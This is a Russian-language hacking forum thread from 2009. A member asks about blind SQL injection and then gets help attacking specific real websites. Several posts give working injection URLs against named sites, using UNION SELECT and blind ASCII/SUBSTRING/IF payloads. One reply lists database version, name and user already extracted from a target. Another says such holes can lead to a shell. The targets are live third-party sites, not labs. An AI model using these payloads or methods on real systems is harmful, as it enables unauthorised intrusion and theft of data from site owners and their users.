ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.03.2009, 14:38
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Где можно почитать о блинд скуль инъекциях?
|
|
|
01.03.2009, 14:43
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
[MySQL/SQL-inj] SQL injection полный FAQ Там же скрипты для вывода всех записей из таблицы, брута имен столбцов и полей.
SQL injection полный FAQ: системные переменные SQL injection полный FAQ: прелести двойного запроса Вообще очень и очень полезная вещь, прошу особенно обратить внимание на неё - случаи когда права на файлы у пользователя БД есть, но кавычки экранируются более чем частые.
И как показывает практика найти, читая сорцы найти, уязвимый запрос, данные из которого подставляются в другой запрос, более чем реально, а результат шелл.
Так же имейте ввиду что иногда, данные из запроса подставляются в функции include() или eval() - тут надо следить за выводом ошибок при SQL инъекции.
Новая SQL Injection Tool 4
SQL инъекция (в т.ч. и blind SQL) SQL инъекция (в т.ч. и blind SQL): Работа с инъекциями в MySQL третьей версии. SQL инъекция (в т.ч. и blind SQL): Скрипт для работы со слепыми инъекциями. Там же можно найти словари для брута имён таблиц и колонок, а вот и ещё:
SQL databases [antichat] sql4 dictionary Имена таблиц Новая альтернатива Benchmark'y или эффективный blind SQL-injection Справочное руководство по MySQL Мануалы с офф сайта (English), по версиям: 3.23, 4.0, 4.1 5.0 5.1 6.0 by Grey |
|
|
|
01.03.2009, 14:53
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://arainia.com/software/gizmo/overview.php?nID=4
Как эту расскрутить... Остановился на 20 столбцах, пишет что мало... |
|
|
|
01.03.2009, 15:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 mailbrush
по мне , так опять блинд
Version : 4.1.22-standard
Database : arainia_members
User : arainia_members@localhost
http://arainia.com/software/gizmo/overview.php?nID=4 AND ASCII(SUBSTRING((select+user() ),1,1))=x/
Последний раз редактировалось Gorev; 01.03.2009 в 15:03..
|
|
|
|
01.03.2009, 15:06
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Gorev, эм.. где там вывод?
http://www.eu-gateway.eu/go.php?nID=-9+and+1=0+union+select+1,2,3,4,5
фух, а это что? тут не выводит
|
|
|
|
01.03.2009, 15:18
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 mailbrush
вывода тм нет, на то она и есть слепая скуля что вывода нет.
http://www.eu-gateway.eu/go.php?nID=-9' тоже слепуха, читай про блинды
|
|
|
|
01.03.2009, 15:24
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Только что прочитал... Вроде подставил, но всеравно та же ошибка - Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource. Подставлял:
Код:
http://www.eu-gateway.eu/go.php?nID=-9+OR+nID=IF(ASCII(SUBSTRING((SELECT+USER()),1,1)=254,1,0)
Что не так? |
|
|
|
01.03.2009, 15:44
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.eu-gateway.eu/go.php?nID=2+and+1=if(substring((select+version()) ,3,1)=0,1,(select+1+union+select+2))/*
версия 4.1
|
|
|
|
01.03.2009, 20:45
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от mailbrush
Код:
http://arainia.com/software/gizmo/overview.php?nID=4
Как эту расскрутить... Остановился на 20 столбцах, пишет что мало...
Код:
http://arainia.com/software/gizmo/overview.php?nID=-4+union+select+version(),2,3--
Вывод в исходной.
|
|
|
|
01.03.2009, 21:32
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Код:
http://www.tv3russia.ru/mysticism/programs/programs_310/foto/photo.php?id4[]=1329
Вроде бы и скуля... а вроде и нет... подскажите) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
